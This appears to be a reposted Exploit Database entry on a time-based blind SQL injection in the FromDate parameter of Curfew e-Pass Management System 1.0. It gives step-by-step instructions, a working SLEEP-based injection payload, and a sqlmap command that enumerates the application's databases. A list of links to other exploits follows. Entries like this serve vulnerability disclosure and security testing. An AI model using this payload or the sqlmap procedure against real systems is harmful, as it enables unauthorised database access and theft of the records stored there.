Curfew e-Pass Management System 1.0 – FromDate SQL Injection

Exploit Database
14 阅读

作者： Puja Dey

日期： 2024-02-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51778/

# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
Injection
# Date: 28/9/2023
# Exploit Author: Puja Dey
# Vendor Homepage: https://phpgurukul.com
# Software Link:
https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp

1) login into the application
2) click on report on pass and capture the request in burpsuite
3) Parameter "FromDate" is vulnerable to SQL Injection
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
'SOzQ'='SOzQ&todate=&submit=
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agent

last Exploits
Curfew e-Pass Management System 1.0 – FromDate SQL Injection的更多信息

Joomla! Component mv_restaurantmenumanager – SQL Injection：
phpCow 2.1 – File Inclusion：
Clipbucket 2.6 – ‘videos.php?cat’ Cross-Site Scripting：
Max’s Image Uploader – Arbitrary File Upload：
Victor CMS 1.0 – ‘post’ SQL Injection：
WordPress Plugin Simple Photo Gallery 1.7.8 – Blind SQL Injection：
OpenForum 2.2 b005 – ‘saveAsAttachment()’ Method Arbitrary File Creation：
Freelancer Calendar 1.01 – SQL Injection：